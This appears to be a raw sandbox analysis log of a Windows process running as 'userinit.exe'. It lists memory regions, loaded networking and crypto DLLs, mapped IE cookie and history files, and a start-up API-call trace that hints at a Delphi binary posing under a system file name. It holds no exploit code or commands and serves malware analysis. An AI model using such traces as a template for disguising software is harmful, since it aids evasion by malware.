id = 6591
start_va = 0x2720000
end_va = 0x27bafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6592
start_va = 0x1410000
end_va = 0x14acfff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6593
start_va = 0x2720000
end_va = 0x27befff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6595
start_va = 0x1410000
end_va = 0x14b0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6596
start_va = 0x2720000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6597
start_va = 0x1410000
end_va = 0x14b4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6601
start_va = 0x2720000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6602
start_va = 0x1410000
end_va = 0x14b8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6603
start_va = 0x2720000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6604
start_va = 0x1410000
end_va = 0x14bcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6607
start_va = 0x2720000
end_va = 0x27cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6608
start_va = 0x27d0000
end_va = 0x2880fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 6609
start_va = 0x2890000
end_va = 0x2942fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 6610
start_va = 0x2720000
end_va = 0x27d4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6612
start_va = 0x27e0000
end_va = 0x2896fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 6613
start_va = 0x2720000
end_va = 0x27d8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6614
start_va = 0x27e0000
end_va = 0x289afff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 6629
start_va = 0x2720000
end_va = 0x27dcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6630
start_va = 0x27e0000
end_va = 0x289efff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 6631
start_va = 0x28a0000
end_va = 0x2960fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 6634
start_va = 0x2720000
end_va = 0x27e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6635
start_va = 0x27f0000
end_va = 0x28b4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6636
start_va = 0x2720000
end_va = 0x27e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6642
start_va = 0x27f0000
end_va = 0x28b8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6643
start_va = 0x2720000
end_va = 0x27eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6666
start_va = 0x27f0000
end_va = 0x28bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6667
start_va = 0x2720000
end_va = 0x27eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6668
start_va = 0x27f0000
end_va = 0x28c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6669
start_va = 0x28d0000
end_va = 0x29a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 6670
start_va = 0x2720000
end_va = 0x27f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6671
start_va = 0x2800000
end_va = 0x28d6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 6672
start_va = 0x2720000
end_va = 0x27f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6673
start_va = 0x2800000
end_va = 0x28dafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 6674
start_va = 0x2720000
end_va = 0x27fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6675
start_va = 0x2800000
end_va = 0x28defff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 6676
start_va = 0x28e0000
end_va = 0x29c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 6677
start_va = 0x2720000
end_va = 0x2802fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6678
start_va = 0x2810000
end_va = 0x28f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6679
start_va = 0x2720000
end_va = 0x2806fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6680
start_va = 0x2810000
end_va = 0x28f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6681
start_va = 0x2720000
end_va = 0x280afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6682
start_va = 0x2810000
end_va = 0x28fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6683
start_va = 0x2720000
end_va = 0x280efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6684
start_va = 0x2810000
end_va = 0x2900fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6685
start_va = 0x2910000
end_va = 0x2a02fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 6686
start_va = 0x2720000
end_va = 0x2814fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6687
start_va = 0x2820000
end_va = 0x2916fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 6688
start_va = 0x2720000
end_va = 0x2818fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6689
start_va = 0x2820000
end_va = 0x291afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 6690
start_va = 0x2720000
end_va = 0x281cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6691
start_va = 0x2820000
end_va = 0x291efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 6692
start_va = 0x2920000
end_va = 0x2a20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 6693
start_va = 0x2720000
end_va = 0x2822fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6694
start_va = 0x2830000
end_va = 0x2934fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 6695
start_va = 0x2720000
end_va = 0x2826fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6696
start_va = 0x2830000
end_va = 0x2938fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 6697
start_va = 0x2720000
end_va = 0x282afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6698
start_va = 0x2830000
end_va = 0x293cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 6699
start_va = 0x2720000
end_va = 0x282ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6700
start_va = 0x2940000
end_va = 0x2a52fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002940000"
filename = ""
Region:
id = 6701
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 6702
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 6703
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 6704
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 6705
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 6706
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 6707
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 6708
start_va = 0x240000
end_va = 0x240fff
entry_point = 0x240000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 6709
start_va = 0x2a60000
end_va = 0x2b5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a60000"
filename = ""
Region:
id = 6710
start_va = 0x250000
end_va = 0x250fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 6711
start_va = 0x6d720000
end_va = 0x6d738fff
entry_point = 0x6d720000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 6712
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 6713
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 6714
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 6715
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 6716
start_va = 0x260000
end_va = 0x29ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 6717
start_va = 0x2be0000
end_va = 0x2cdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002be0000"
filename = ""
Region:
id = 6718
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 6719
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 6720
start_va = 0x2ce0000
end_va = 0x2faefff
entry_point = 0x2ce0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 6721
start_va = 0x2a0000
end_va = 0x2a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002a0000"
filename = ""
Region:
id = 6722
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 6723
start_va = 0x390000
end_va = 0x390fff
entry_point = 0x390000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 6724
start_va = 0x3a0000
end_va = 0x3a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003a0000"
filename = ""
Region:
id = 6725
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 6726
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 6727
start_va = 0x390000
end_va = 0x390fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 6728
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 6729
start_va = 0x3b0000
end_va = 0x3dbfff
entry_point = 0x3b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 6730
start_va = 0x3e0000
end_va = 0x3e7fff
entry_point = 0x3e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 6731
start_va = 0x3f0000
end_va = 0x3fffff
entry_point = 0x3f0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 6732
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 6733
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 6734
start_va = 0x2fb0000
end_va = 0x30dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fb0000"
filename = ""
Region:
id = 6735
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 6736
start_va = 0x30e0000
end_va = 0x330ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030e0000"
filename = ""
Region:
id = 6737
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 6738
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 6739
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 6740
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 6741
start_va = 0x2fb0000
end_va = 0x306ffff
entry_point = 0x2fb0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 6742
start_va = 0x30a0000
end_va = 0x30dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030a0000"
filename = ""
Thread:
id = 341
os_tid = 0x8d8
[0200.084] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0200.084] GetKeyboardType (nTypeFlag=0) returned 4
[0200.084] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0200.085] GetStartupInfoA (in: lpStartupInfo=0x10fbdc | out: lpStartupInfo=0x10fbdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0200.085] GetVersion () returned 0x1db10106
[0200.085] GetVersion () returned 0x1db10106
[0200.085] GetCurrentThreadId () returned 0x8d8
[0200.085] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x10f6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0200.085] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10f5b3, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0200.085] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x10f6c8 | out: phkResult=0x10f6c8*=0x0) returned 0x2
[0200.085] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x10f6c8 | out: phkResult=0x10f6c8*=0x0) returned 0x2
[0200.085] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x10f6c8 | out: phkResult=0x10f6c8*=0x0) returned 0x2
[0200.085] lstrcpynA (in: lpString1=0x10f5b3, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0200.085] GetThreadLocale () returned 0x409
[0200.085] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x10f6c3, cchData=5 | out: lpLCData="ENU") returned 4
[0200.086] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0200.086] lstrcpynA (in: lpString1=0x10f5d0, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0200.086] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0200.086] lstrcpynA (in: lpString1=0x10f5d0, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0200.086] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0200.086] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0200.087] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x133640
[0200.087] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x640000
[0200.087] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x134640
[0200.087] VirtualAlloc (lpAddress=0x640000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x640000
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0200.087] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x10f7fc, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x10f7e8, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0200.088] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x10f7e8, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0200.088] GetVersionExA (in: lpVersionInformation=0x10fb80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10fb80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0200.088] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0200.088] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0200.088] GetThreadLocale () returned 0x409
[0200.088] GetThreadLocale () returned 0x409
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Jan") returned 4
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x10fa58, cchData=256 | out: lpLCData="January") returned 8
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Feb") returned 4
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x10fa58, cchData=256 | out: lpLCData="February") returned 9
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Mar") returned 4
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x10fa58, cchData=256 | out: lpLCData="March") returned 6
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Apr") returned 4
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x10fa58, cchData=256 | out: lpLCData="April") returned 6
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x10fa58, cchData=256 | out: lpLCData="May") returned 4
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x10fa58, cchData=256 | out: lpLCData="May") returned 4
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Jun") returned 4
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x10fa58, cchData=256 | out: lpLCData="June") returned 5
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Jul") returned 4
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x10fa58, cchData=256 | out: lpLCData="July") returned 5
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Aug") returned 4
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x10fa58, cchData=256 | out: lpLCData="August") returned 7
